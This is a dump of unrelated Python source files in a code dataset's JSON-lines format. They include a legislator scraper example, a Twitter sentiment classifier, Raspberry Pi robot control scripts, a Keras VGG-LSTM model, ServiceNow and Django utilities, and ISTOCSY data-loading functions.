False\n res,tipoCuenta = desencriptarContra(usuario)\n if contra == res :\n entrar = True\n return entrar, tipoCuenta\n else:\n return entrar, tipoCuenta\n \n","sub_path":"Utiles/Verificar.py","file_name":"Verificar.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"221362055","text":"from pupa.scrape import Jurisdiction, Scraper, Legislator\nfrom larvae.organization import Organization\n\n\nclass Example(Jurisdiction):\n jurisdiction_id = 'ex'\n\n def get_metadata(self):\n return {'name': 'Example',\n 'legislature_name': 'Example Legislature',\n 'legislature_url': 'http://example.com',\n 'terms': [{'name': '2013-2014', 'sessions': ['2013'],\n 'start_year': 2013, 'end_year': 2014\n }],\n 'provides': ['people'],\n 'parties': [{'name': 'Independent' },\n {'name': 'Green' },\n {'name': 'Bull-Moose'}\n ],\n 'session_details': {'2013': {'_scraped_name': '2013'}},\n 'feature_flags': [],\n }\n\n def get_scraper(self, term, session, scraper_type):\n if scraper_type == 'people':\n return ExamplePersonScraper\n\n def scrape_session_list(self):\n return ['2013']\n\n\nclass ExamplePersonScraper(Scraper):\n\n def get_people(self):\n # committee\n tech = Organization('Technology', classification='committee')\n tech.add_post('Chairman', 'chairman')\n yield tech\n\n # subcommittee\n ecom = Organization('Subcommittee on E-Commerce',\n parent=tech,\n classification='committee')\n yield ecom\n\n p = Legislator('Paul Tagliamonte', district='6', chamber='upper',\n party='Independent')\n p.add_committee_membership('Finance')\n p.add_membership(tech, role='chairman')\n yield p\n","sub_path":"example/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"492622694","text":"\"\"\"\nThis plots the mean ionisation fraction _inside_ the Hii region.\n\nCreated by: Josh Borrow\nCreated on: 7th February 2018\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom astropy.table import Table\nfrom helper import *\n\n# Global variable that thells you where the files are.\nlocations = (\"../temp_var_lowdensity\", \"../temp_var_highdensity\")\nlabels = (\"$n_h = 10^1$ cm$^{-3}$\", \"$n_h = 10^3$ cm$^{-3}$\")\n\nfig, (ax) = plt.subplots(1, 1)\n\nfor location, label in zip(locations, labels):\n cloud = []\n star = []\n\n\n for number in range(1, 11):\n density = 10\n temperature = number * 1e4\n\n ovw = Table.read(f\"{location}/{int(temperature)}/hii_coolstar.ovr\", format=\"ascii\")\n\n edge_of_region = find_turning_point(ovw, \"HII\")\n temp = np.mean(ovw[\"HII\"][ovw[\"depth\"] < edge_of_region])\n \n cloud.append(temp)\n star.append(temperature)\n\n\n ax.plot(star, cloud, label=label)\n\n\nax.set_xlabel(\"Stellar temperature (K)\")\nax.set_ylabel(\"Ionised fraction\")\n\nax.legend()\n\nplt.savefig(\"cloud_ion.pdf\")\n\n","sub_path":"analysis/plot_mean_ionisation.py","file_name":"plot_mean_ionisation.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"262464422","text":"import sys\n\nimport toml\n\nfrom my_dataclasses import AuthInfo, Secrets\n\n\nclass ConfigFromToml(object):\n def __init__(self, secrets: Secrets) -> None:\n self.api_key = secrets.api_key\n self.api_secret = secrets.api_secret\n self.access_token = secrets.access_token\n self.access_token_secret = 
secrets.access_token_secret\n self.resource_url = secrets.resource_url\n\n def _view_tokens(self):\n print(\"=\" * 50)\n print(f\"api_key is {self.api_key}\")\n print(f\"api_secret is {self.api_secret}\")\n print(f\"access_token is {self.access_token}\")\n print(f\"access_token_secret is {self.access_token_secret}\")\n\n\nclass ConfigForUseTwitterAPI(ConfigFromToml):\n def __init__(self, secrets: Secrets) -> None:\n # identical to the parent initialiser, so simply delegate to it\n super().__init__(secrets)\n\n def _api_auth_info(self):\n api_auth_info = AuthInfo(\n api_key=self.api_key,\n api_secret=self.api_secret,\n access_token=self.access_token,\n access_token_secret=self.access_token_secret,\n resource_url=self.resource_url,\n )\n return api_auth_info\n\n\nif __name__ == \"__main__\":\n args = sys.argv\n\n secrets = Secrets(\n webhook_url=\"{}\".format(args[1]),\n api_key=\"{}\".format(args[2]),\n api_secret=\"{}\".format(args[3]),\n access_token=\"{}\".format(args[4]),\n access_token_secret=\"{}\".format(args[5]),\n resource_url=\"https://api.twitter.com/1.1/statuses/user_timeline.json\",\n )\n\n config_from_toml = ConfigFromToml(secrets)\n config_from_toml._view_tokens()\n\n config_for_use_twitter_api = ConfigForUseTwitterAPI(secrets)\n api_auth_info = config_for_use_twitter_api._api_auth_info()\n print(api_auth_info)\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"584933060","text":"import tfe2_pipeline_wrapper.lib.ServiceNowCalls as SNOW\nimport click\nimport json\n\n\n@click.command()\n@click.option('--action_type', required=True)\n@click.option('--configuration_file', required=True)\n@click.option('--log_file', required=True)\n@click.option('--sys_id', required=False)\ndef main(action_type, configuration_file, log_file, sys_id=None):\n # Open Files\n with open(configuration_file) as config_file:\n config = json.load(config_file)\n with open(log_file, \"r\", encoding=\"utf-8\") as log_handle: # renamed so the path argument is not shadowed\n log = log_handle.read()\n\n # Open or Close a change\n results = {}\n if action_type == \"plan\":\n results = SNOW.raise_servicenow_change(configuration_data=config, plan_log=log)\n elif action_type == \"apply\":\n results = SNOW.close_servicenow_change(configuration_data=config, sys_id=sys_id, apply_results=log)\n else:\n print(\"Invalid Action Type\")\n\n # Write run results to file\n with open('change_results.json', \"w\", encoding=\"utf-8\") as outfile:\n outfile.write(json.dumps(results))\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tfe2_pipeline_wrapper/servicenow_change.py","file_name":"servicenow_change.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"432652005","text":"from django.urls import path\n\nfrom .views import ArticleListView, ArticleDetailView, ArticleUpdateView, ArticleDeleteView, ArticleCreateView\n\n# NOTE: the '<int:pk>' path converters below appear to have been stripped by text\n# extraction (the patterns read '/', '/edit/', ...); restored on that assumption.\nurlpatterns = [\n path('<int:pk>/', ArticleDetailView.as_view(), name='articleDetailUrl'),\n path('<int:pk>/edit/', ArticleUpdateView.as_view(), name='articleUpdateUrl'),\n path('<int:pk>/delete/', ArticleDeleteView.as_view(), name='articleDeleteUrl'),\n path('new/', ArticleCreateView.as_view(), name='articleNewUrl'),\n path('', ArticleListView.as_view(), 
name='articleListUrl'),\n]","sub_path":"william_newspaper/articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"171800704","text":"import twitter\nimport json\nimport csv\nimport time\nimport pre_processor as pp\nimport nltk\n\n\ndef twitter_connection():\n with open('credentials.json') as f:\n credentials = json.load(f)\n\n twitter_api = twitter.Api(consumer_key=credentials['consumer_key'],\n consumer_secret=credentials['consumer_secret'],\n access_token_key=credentials['access_token_key'],\n access_token_secret=credentials['access_token_secret'])\n\n return twitter_api\n\n\ndef build_test_set(twitter_api, search_keyword):\n try:\n test_tweets = twitter_api.GetSearch(search_keyword, count=10)\n print(len(test_tweets), \"tweets have been fetched from twitter to build the testing set\")\n return [{\"text\": status.text, \"label\": None} for status in test_tweets]\n except Exception as e:\n print(\"Oops something went wrong. Try again later\", e)\n\n\ndef fetch_tweets_by_id(tweets_ids):\n tweets_limit = 180\n fetching_window = 15*60\n train_tweets = []\n\n for tweet in tweets_ids:\n try:\n status = twitter_api.GetStatus(tweet['tweetId'])\n tweet['text'] = status.text\n train_tweets.append(tweet)\n print(\"tweet fetched\", tweet['tweetId'])\n time.sleep(fetching_window/tweets_limit)\n except Exception as e:\n print(tweet['tweetId'], e)\n continue\n\n print(\"We have fetched\", len(train_tweets), \"tweets for the trainning set\")\n return train_tweets\n\n\ndef write_csv_output(train_tweets):\n with open('training_set.csv', 'w') as csv_output:\n csv_writer = csv.writer(csv_output, delimiter=',', quotechar=\"\\\"\")\n for tweet in train_tweets:\n try:\n csv_writer.writerow([tweet[\"tweetId\"], tweet[\"text\"], tweet[\"topic\"], tweet[\"label\"]])\n except Exception as e:\n print(e)\n\n\ndef build_training_set():\n tweets_ids = []\n\n with open('corpus.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',', quotechar=\"\\\"\")\n for row in csv_reader:\n tweets_ids.append({'tweetId': row[2], 'label': row[1], 'topic': row[0]})\n\n train_tweets = fetch_tweets_by_id(tweets_ids)\n write_csv_output(train_tweets)\n\n return train_tweets\n\n\ndef get_training_set():\n tweets_list = []\n with open('training_set.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',', quotechar=\"\\\"\")\n for row in csv_reader:\n tweets_list.append({'tweetId': row[0], 'label': row[3], 'topic': row[2], 'text': row[1]})\n if len(tweets_list) == 0:\n return build_training_set()\n return tweets_list\n\n\ndef build_vocabulary(pre_processed_train_set):\n all_words = []\n\n for (words, sentiment) in pre_processed_train_set:\n all_words.extend(words)\n\n wordlist = nltk.FreqDist(all_words)\n word_features = wordlist.keys()\n\n return word_features\n\n\ndef extract_features(tweet):\n tweet_words = set(tweet)\n features = {}\n for word in word_features:\n features['contains(%s)' % word] = (word in tweet_words)\n return features\n\n\n#main\npre_process = pp.PreProcessTweets()\n\ntwitter_api = twitter_connection()\ntest_set = build_test_set(twitter_api, \"racism\")\ntrain_set = get_training_set()\n\npre_processed_test_set = pre_process.process_tweets(test_set)\npre_processed_train_set = pre_process.process_tweets(train_set)\nword_features = build_vocabulary(pre_processed_train_set)\ntraining_features = nltk.classify.apply_features(extract_features, 
pre_processed_train_set)\nNBayesClassifier = nltk.NaiveBayesClassifier.train(training_features)\nNBResultLabels = [NBayesClassifier.classify(extract_features(tweet[0])) for tweet in pre_processed_test_set]\n\nif NBResultLabels.count('positive') > NBResultLabels.count('negative'):\n print(\"Overall Positive Sentiment\")\n print(\"Positive Sentiment Percentage = \" + str(100*NBResultLabels.count('positive')/len(NBResultLabels)) + \"%\")\nelse:\n print(\"Overall Negative Sentiment\")\n print(\"Negative Sentiment Percentage = \" + str(100*NBResultLabels.count('negative')/len(NBResultLabels)) + \"%\")\n\n\n\n\n\n","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"259554619","text":"import RPi.GPIO as gpio\r\nimport time\r\nimport numpy as np \r\nfrom matplotlib import pyplot as plt\r\nimport math\r\nimport os\r\nfrom picamera import PiCamera\r\nfrom time import sleep\r\nfrom picamera.array import PiRGBArray\r\nimport cv2\r\nimport imutils\r\nimport picamera\r\nfrom time import sleep\r\nfrom PIL import Image\r\n\r\ntrig = 16\r\necho = 18\r\nsum=0\r\naverage=0\r\ncamera_stat = False\r\n\r\n\r\ndef distance():\r\n\t#init()\r\n\t#gpio.cleanup()\r\n\t#gpio.setwarnings(False)\r\n\tavg_dist = []\r\n\tprint(\"Getting the distance\")\r\n\tfor i in range(10):\r\n\t\tgpio.setmode(gpio.BOARD)\r\n\t\tgpio.setup(trig, gpio.OUT)\r\n\t\tgpio.setup(echo, gpio.IN)\r\n\r\n\t\tgpio.output(trig, False)\r\n\t\ttime.sleep(0.01)\r\n\t\t\r\n\t\t#generate trigger pulse\r\n\t\tgpio.output(trig, True)\r\n\t\ttime.sleep(0.00001)\r\n\t\tgpio.output(trig,False)\r\n\t\tprint(\"Reading the Distance\",gpio.input(echo))\r\n\t\twhile gpio.input(echo) == 0:\r\n\t\t\tpulse_start = time.time()\r\n\t\t\t#print(\"Pulse start is \",pulse_start)\r\n\r\n\t\twhile gpio.input(echo) == 1:\r\n\t\t\tpulse_end = time.time()\r\n\t\tprint(\"Out of loop \")\r\n\t\tpulse_duration = pulse_end - pulse_start\r\n\r\n\t\t# convert time to distacne \r\n\t\tdistance = pulse_duration*17150\r\n\t\tdistance = round(distance, 2)\r\n\t\tavg_dist.append(distance)\r\n\r\n\t#cleanup gpio pims and return the disatmce \t\r\n\tavg_dist = np.mean(avg_dist)\r\n\tprint(\"got the distance\",distance)\r\n\tgpio.cleanup()\r\n\treturn avg_dist\r\n\r\ndef init():\r\n\tgpio.setmode(gpio.BOARD)\r\n\tgpio.setup(31,gpio.OUT)\r\n\tgpio.setup(33,gpio.OUT)\r\n\tgpio.setup(35,gpio.OUT)\r\n\tgpio.setup(37,gpio.OUT)\r\n\r\n\tgpio.setup(12,gpio.IN,pull_up_down = gpio.PUD_UP)\r\n\tgpio.setup(7,gpio.IN,pull_up_down = gpio.PUD_UP)\r\n\r\n\r\ndef gameover():\r\n\tgpio.output(31,False)\r\n\tgpio.output(33,False)\r\n\tgpio.output(35,False)\r\n\tgpio.output(37,False)\r\n\tgpio.cleanup()\r\n\r\ndef revs_ticks(final_dist):\r\n\r\n\trevs = (120/(2*math.pi* 0.0325)) * final_dist\r\n\t## for Ticks\r\n\tticks = (960/(2*math.pi* 0.0325)) * final_dist\r\n\treturn revs, ticks\r\n\r\n\r\ndef turn(deg):\r\n\tcircu = 2*math.pi*0.1007\r\n\tarc_lenght = (deg/360)*circu\r\n\t## revs calculation\r\n\trevs = (120/(2*math.pi* 0.0325)) * arc_lenght\r\n\t## Ticks Calculation\r\n\tticks = (960/(2*math.pi* 0.0325)) * arc_lenght\r\n\treturn revs, ticks\r\n\r\ndef execute(distance,pwm1,pwm2,val,final_ticks,event):\r\n\tcounterBR = np.uint64(0)\r\n\tcounterFL = np.uint64(0)\r\n\r\n\tbuttonBR = int(0)\r\n\tbuttonFL = int(0) \r\n\tdist = 0\r\n\tfinal_dist = distance\r\n\tif event == \"a\":\r\n\t\t# Final Values to the PWM for 
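each drive mode (the +/- offsets are empirical trims).\r\n\t\t# Hedged aside, not in the original: RPi.GPIO duty cycles must stay in [0, 100],\r\n\t\t# so a clamped update such as\r\n\t\t# pwm1.ChangeDutyCycle(max(0, min(100, val + trim))) # 'trim' is a hypothetical offset\r\n\t\t# would guard these hand-tuned values.\r\n\t\t# driving 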
forward\r\n\t\tpwm1.start(val-4)\r\n\t\tpwm2.start(val+1)\t\r\n\telif event == 's':\r\n\t\tpwm1.start(val-1)\r\n\t\t#pwm2.start(val+62)\r\n\t\tpwm2.start(val+62)\r\n\t\r\n\telse:\r\n\t\tpwm1.start(val)\r\n\t\tpwm2.start(val)\r\n\ttime.sleep(0.1)\r\n\tfor i in range(0,1000000000):\r\n\t\t#print()\r\n\t\tif int(gpio.input(12)) != int(buttonBR):\r\n\t\t\tbuttonBR = int(gpio.input(12))\r\n\t\t\tcounterBR += 1\r\n\r\n\t\tif int(gpio.input(7)) != int(buttonFL):\r\n\t\t\tbuttonFL = int(gpio.input(7))\r\n\t\t\tcounterFL += 1\r\n\r\n\t\tif counterFL < counterBR and event != 's':\r\n\t\t\t#print(\"duty cycle change\",counterFL,counterBR)\r\n\t\t\tpwm2.ChangeDutyCycle(val+5)\r\n\t\t\t\r\n\t\tif counterFL > counterBR and event != 's':\r\n\t\t\t#print(\"changing duty cycle\",counterFL,counterBR)\r\n\t\t\tpwm1.ChangeDutyCycle(val+5)\r\n\r\n\t\tif counterFL < counterBR and event == 's':\r\n\t\t\t#print(\"for reverse front left\",counterFL,counterBR)\r\n\t\t\tpwm2.ChangeDutyCycle(val+7)\r\n\t\t\t\r\n\t\tif counterFL > counterBR and event == 's':\r\n\t\t\t#print(\"for reverse\",counterFL,counterBR)\r\n\t\t\tpwm1.ChangeDutyCycle(val+5)\r\n\t\t\r\n\t\t#print(final_ticks)\r\n\t\tif counterBR >= final_ticks and counterFL >= final_ticks and (event == 'w' or event == 's') :\r\n\t\t\tprint(\"Travelled\",final_dist,\"meters\")\r\n\t\t\tbreak\r\n\t\telif (counterFL >= final_ticks and counterBR >= final_ticks) and event =='a':\r\n\t\t\tprint('Travelled for ',final_dist,\"angle\")\r\n\t\t\tbreak\r\n\t\telif counterFL >= final_ticks and counterBR >= final_ticks *1.4 and event == 'd':\r\n\t\t\tprint('Travelled in ',final_dist,\"angle\")\r\n\t\t\tbreak\r\n\tgpio.cleanup()\r\n\t\r\ndef forward(inp):\r\n\tinit()\r\n\tpwm1 = gpio.PWM(31,50)\r\n\tpwm2= gpio.PWM(37,50)\r\n\tval = 30\r\n\t#distance = inp\r\n\tfinal_dist,final_ticks = revs_ticks(inp)\r\n\texecute(inp,pwm1,pwm2,val,final_ticks,'w')\r\n\t#print(\"Moved Forward\")\r\n\r\n\r\ndef reverse(inp):\r\n\tpwm1 = gpio.PWM(33,50)\r\n\tpwm2= gpio.PWM(35,50)\r\n\tval = 30\r\n\t#distance = inp\r\n\tfinal_dist,final_ticks = revs_ticks(inp)\r\n\texecute(inp,pwm1,pwm2,val,final_ticks,'s')\r\n\t#print(\"Moved Backward\")\r\n\r\n\r\ndef right(inp):\r\n\tpwm1 = gpio.PWM(31,50)\r\n\tpwm2= gpio.PWM(35,50)\r\n\tval = 80\r\n\t#distance = inp\r\n\tfinal_dist,final_ticks = turn(inp)\r\n\texecute(inp,pwm1,pwm2,val,final_ticks,'d')\r\n\t#print(\"Pivoted Right\")\r\n\r\n\r\ndef left(inp):\r\n\tpwm1 = gpio.PWM(33,50)\r\n\tpwm2= gpio.PWM(37,50)\r\n\tval = 70\r\n\t#distance = inp\r\n\tfinal_dist,final_ticks = turn(inp)\r\n\texecute(inp,pwm1,pwm2,val,final_ticks,'a')\r\n\t#print(\"Pivoted Left\")\r\n\r\ndef pos(l,theta):\r\n\tnew_x= l*(math.cos(theta*(3.14/180)))\r\n\tnew_y= l*(math.sin(theta*(3.14/180)))\r\n\treturn new_x,new_y,theta\r\n\r\ndef closeg():\r\n\t\r\n\tgpio.setmode(gpio.BOARD)\r\n\tgpio.setup(36, gpio.OUT)\r\n\tpwm = gpio.PWM(36, 50)\r\n\tpwm.start(5)\r\n\tpwm.ChangeDutyCycle(3.5)\r\n\ttime.sleep(2)\r\n\r\ndef openg():\r\n\tgpio.setmode(gpio.BOARD)\r\n\tgpio.setup(36, gpio.OUT)\r\n\tpwm = gpio.PWM(36, 50)\r\n\tpwm.start(5)\r\n\tpwm.ChangeDutyCycle(9.5)\r\n\ttime.sleep(2)\t\r\n\r\ndef em():\r\n\tcmd = 'python3 email01.py'\r\n\tos.system(cmd)\r\n\r\ndef main():\r\n\tinit()\r\n\tcamera = PiCamera()\r\n\tcamera.rotation = 180\r\n\trawCapture = PiRGBArray(camera, size=(640,480))\r\n\tcamera.resolution = (640,480)\r\n\tcamera.start_preview() \r\n\ttime.sleep(2)\r\n\tcamera.capture('hsvcalib.jpg')\r\n\tcamera.stop_preview()\r\n\timage =cv2.imread(\"hsvcalib.jpg\")\r\n\tlower_red= 
np.array([0,150,82])\r\n\r\n\tupper_red = np.array([5,231,222])\r\n\r\n\thsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\r\n\tmask = cv2.inRange(hsv,lower_red,upper_red)\r\n\tresult = cv2.bitwise_and(hsv, hsv, mask=mask)\r\n\tblur = cv2.GaussianBlur(mask,(9,9),0)\r\n\t#cv2.imwrite('hsv.jpg',hsv)\r\n\t#cv2.imwrite('result.jpg',result)\r\n\tcv2.drawMarker(image,(320,240),1)\r\n\tret,thresh = cv2.threshold(blur,127,255,0)\r\n\tim2, contours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n\tcv2.drawContours(image, contours, -1, (0,0,255), 3)\r\n\t# Find the index of the largest contour\r\n\tareas = [cv2.contourArea(c) for c in contours]\r\n\tif areas != []:\r\n\t\tprint(areas)\r\n\t\tmax_index = np.argmax(areas)\r\n\t\tcamera_stat = True\r\n\t\tcnt = contours[max_index]\r\n\t\t(x,y),radius = cv2.minEnclosingCircle(cnt)\r\n\t\tcenter = (int(x),int(y))\r\n\t\tradius = int(radius)\r\n\t\tcv2.circle(image,center,radius,(0,255,0),2)\r\n\t\tcv2.circle(image,center,1,(0,255,255),2)\r\n\t\t#cv2.imshow('o',image)\r\n\t\t#cv2.waitKey(0)\r\n\t\tdegblock = 0\r\n\t\t# NOTE: a bare 'time.sleep' (no call, a no-op) stood here and was removed\r\n\t\tif x>340:\r\n\t\t\tdegblock = (x-640/2)*0.061\r\n\t\t\tright(degblock)\r\n\t\tif x<290:\r\n\t\t\tdegblock = abs((x-(640/2))*0.061)\r\n\t\t\tleft(degblock)\r\n\t\ttime.sleep(2)\r\n\t\tcamera.close()\r\n\t\tprint(\"The value of x is\",x)\r\n\t\tgpio.cleanup()\r\n\t\tif x>280 and x<350:\r\n\t\t\tprint(\"In the loop\")\r\n\t\t\tdist = distance()\r\n\t\t\t# NOTE: this condition was garbled to 'if 24100:' during extraction (a\r\n\t\t\t# tag-like token '<dist and dist>' was stripped); reconstructed below,\r\n\t\t\t# although the author may have intended 24 < dist < 100\r\n\t\t\tif 24<dist and dist>100:\r\n\t\t\t\tcloseg()\r\n\telse:\r\n\t\tcamera_stat = False\r\n\tprint(\"The camera stat\")\r\n\treturn camera_stat\r\n\t\t# gpio.cleanup()\r\n\r\nfor i in range(0,1000):\r\n\tstat = main()\r\n\tif stat != True:\r\n\t\tprint(\"Exiting\")\r\n\t\tbreak\r\n\tprint(i)\r\n\r\ngameover()\r\n","sub_path":"hw9/trackblock.py","file_name":"trackblock.py","file_ext":"py","file_size_in_byte":7280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"61099129","text":"from keras.applications.vgg19 import VGG19\nfrom keras.layers import LSTM\nfrom keras import Sequential\nfrom keras.layers import Dense, Flatten, Dropout\nfrom keras.layers import TimeDistributed\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport load_dataset as load\nimport os\nimport util\nnp.set_printoptions(threshold=np.inf)\nprint(os.getcwd())\n\n# set hyperparameters\nseq_length = 60\nbatch_size = 2\nepoch = 50\nclass_num = 2\nlr = 0.0001\ndecay = 0.0001\nadam = Adam(lr=lr, decay=decay)\n\n\n# Load dataset\ntrain_data_path = \"/dataset/train_data.npy\"\ntrain_label_path = \"/dataset/train_labels_VA.npy\"\nval_data_path = \"/dataset/val_data.npy\"\nval_label_path = \"/dataset/val_labels_VA.npy\"\n\nx_train = load.load_dataset(train_data_path)\ny_train = load.load_dataset(train_label_path)\nx_val = load.load_dataset(val_data_path)\ny_val = load.load_dataset(val_label_path)\n\n\n#setup vgg cnn\nvgg = VGG19(include_top=False, weights='imagenet', input_shape=(72,72,3))\ncnn = Sequential()\ncnn.add(vgg)\ncnn.add(Dropout(0.5))\ncnn.add(Flatten())\n\n#add LSTM to model\nmodel = Sequential()\nmodel.add(TimeDistributed(cnn, input_shape=(seq_length, 72, 72, 3), trainable=False))\nmodel.add(LSTM(128, input_shape=(batch_size, seq_length, 1), return_sequences=True))\nmodel.add(TimeDistributed(Dropout(0.5)))\n\n\n# add 
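the classification head.\n# Hedged aside (illustration only, not from the original script): the same\n# per-timestep head built stand-alone would be e.g.\n# head = Sequential([Dense(128), Dropout(0.5), Dense(class_num, activation='linear')])\n# which the next lines apply to every LSTM output via TimeDistributed.\n# 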
FC\nmodel.add(TimeDistributed(Dense(128)))\nmodel.add(TimeDistributed(Dropout(0.5)))\nmodel.add(TimeDistributed(Dense(class_num, activation='linear')))\n\n\n# train\nprint(model.summary())\nmodel.compile(optimizer=adam, loss='mse', metrics=[util.ccc, 'mse'])\n\n\n# save the model\nif not os.path.exists(\"./model\"):\n\tos.makedirs(\"./model\")\n\nfilepath = \"./model/model.h5\"\ncheckpoint = ModelCheckpoint(filepath, save_best_only=True)\ncallbacks_list = [checkpoint]\n\n\nhist = model.fit(x=x_train, y=y_train, validation_data=(x_val, y_val), epochs=epoch, batch_size=batch_size, callbacks=callbacks_list)\n\nprint(hist.history)\n","sub_path":"training/VA_models/VA_model4.py","file_name":"VA_model4.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"574422520","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nUtility functions for runISTOCSY.py\n\nCreated on Fri Apr 6 11:32:54 2018\n\n@author: cs401\n\"\"\"\n\nimport os\nimport numpy as np\nimport pandas\nfrom scipy.stats import pearsonr, spearmanr, kendalltau\nimport networkx as nx\nimport warnings\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PyQt5.QtCore import QSizeF\nfrom PyQt5.QtPrintSupport import QPrinter\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.linear_model import (LinearRegression, RANSACRegressor)\n\n\ndef _loadDataset(self, intensityDataFile=None, featureMetadataFile=None, sampleMetadataFile=None, datasetName='Data', datasetType='Targeted'):\n\t\"\"\" Load data from intensityData, featureMetadata and sampleMetadata csv files \"\"\"\n\n\t# Check input\n\tif ((intensityDataFile is None) or (featureMetadataFile is None) or (sampleMetadataFile is None)):\n\t\traise TypeError('Either intensityDataFile, featureMetadataFile and sampleMetadataFile files must be set')\n\n\t# Import data and do some basic checks\n\t(intensityData, featureMetadata, sampleMetadata) = _importAndCheckData(intensityDataFile, featureMetadataFile, sampleMetadataFile, datasetName, datasetType)\n\n\t# Update details for number of samples and features in loaded dataset\n\tself.Attributes['datasetsDetails'][-1].append(intensityData.shape[0])\n\tself.Attributes['datasetsDetails'][-1].append(intensityData.shape[1])\n\n\t# If this is the first dataset loaded\n\tif not hasattr(self, 'dataset'):\n\n\t\t# Create dataset\n\t\tclass Dataset(object):\n\n\t\t\tdef __init__(self):\n\t\t\t\tself.intensityData = np.array(None)\n\t\t\t\tself.featureMetadata = pandas.DataFrame(None, columns=['Dataset Name', 'Data Type', 'Feature Name', 'Feature Name Original', 'Retention Time', 'm/z', 'ppm', 'Targeted Feature Number', 'Median Intensity Scaled'])\n\t\t\t\tself.sampleMetadata = pandas.DataFrame(None, columns=['Sample ID', 'Sample File Name'])\n\n\t\tself.dataset = Dataset()\n\n\t\t# Load into dataset object\n\t\tself.dataset.intensityData = intensityData\n\t\tself.dataset.featureMetadata = self.dataset.featureMetadata.append(featureMetadata, ignore_index=True, sort=False)\n\t\tself.dataset.sampleMetadata = self.dataset.sampleMetadata.append(sampleMetadata, ignore_index=True, sort=False)\n\n\t# Else, match new data into existing (on Sample ID)\n\telse:\n\n\t\t# Match datasets\n\t\tself = _matchDatasets(self, intensityData, featureMetadata, sampleMetadata)\n\n\t# Enforce types\n\ttry:\n\t\tself.dataset.featureMetadata['ppm'] = self.dataset.featureMetadata['ppm'].astype(np.float64)\n\t\tself.dataset.featureMetadata['Retention Time'] = 
self.dataset.featureMetadata['Retention Time'].astype(np.float64)\n\t\tself.dataset.featureMetadata['m/z'] = self.dataset.featureMetadata['m/z'].astype(np.float64)\n\t\tself.dataset.featureMetadata['Targeted Feature Number'] = self.dataset.featureMetadata['Targeted Feature Number'].astype(np.float64)\n\texcept:\n\t\t_displayMessage('ALERT: please check for non-numerical values in appropriate featureMetadata.csv file columns')\n\n\n\t# Update details for number of samples and features in full ISTOCSY dataset\n\tself.Attributes['istocsyDatasetDetails'][0], self.Attributes['istocsyDatasetDetails'][1] = self.dataset.intensityData.shape\n\n\n\ndef _importAndCheckData(intensityDataFile, featureMetadataFile, sampleMetadataFile, datasetName, datasetType, relativeIntensityMetric='max'):\n\t\"\"\" Helper function to import new dataset \"\"\"\n\t\t\n\t# Import data\n\tintensityData = np.genfromtxt(intensityDataFile, delimiter=',')\n\tfeatureMetadata = pandas.read_csv(featureMetadataFile, index_col=False)#index_col=0)\n\tsampleMetadata = pandas.read_csv(sampleMetadataFile, index_col=False)#index_col=0)\n\n\t# Check attributes (new data)\n\tds, dv = intensityData.shape\n\tfv = featureMetadata.shape[0]\n\tss = sampleMetadata.shape[0]\n\n\tif dv != fv:\n\t\traise ValueError('intensityData and featureMetadata have different dimensions')\n\tif ds != ss:\n\t\traise ValueError('intensityData and sampleMetadata have different dimensions')\n\n\t# Check 'Sample ID' and 'Feature Name' present\n\ttry:\n\t\tfeatureMetadata['Feature Name'] = featureMetadata['Feature Name'].astype(str)\n\t\tsampleMetadata['Sample ID'] = sampleMetadata['Sample ID'].astype(str)\n\texcept:\n\t\traise ValueError('\"Feature Name\" and \"Sample ID\" columns must be present')\n\n\tfeatureMetadata['Dataset Name'] = datasetName\n\tfeatureMetadata['Data Type'] = datasetType\n\tif datasetType == 'Targeted':\n\t\tfeatureMetadata['Targeted Feature Number'] = np.arange(dv)\n\n\t# Check for and exclude samples with duplicate 'Sample ID's\n\tu_ids, u_counts = np.unique(sampleMetadata['Sample ID'], return_counts=True)\n\tif any(u_counts > 1):\n\n\t\t# Warn\n\t\twarnings.warn('Check and remove duplicates in sampleMetadata file, by default these will be excluded')\n\n\t\t# By default delete duplicates\n\t\tsampleList = u_ids[u_counts > 1]\n\n\t\tsampleMask = np.squeeze(np.ones([sampleMetadata.shape[0], 1], dtype=bool), axis=1)\n\n\t\tfor sample in sampleList:\n\t\t\tsampleMask[sampleMetadata[sampleMetadata['Sample ID'] == sample].index] = False\n\n\t\tsampleMetadata = sampleMetadata.loc[sampleMask]\n\t\tsampleMetadata.reset_index(drop=True, inplace=True)\n\t\tintensityData = intensityData[sampleMask, :]\n\n\t# NOTE: nan values must not be present (for correlation calculation) - replace with zeros\n\tif (np.isnan(intensityData).any()):\n\n\t\t# Warn\n\t\twarnings.warn('Missing (nan) values found 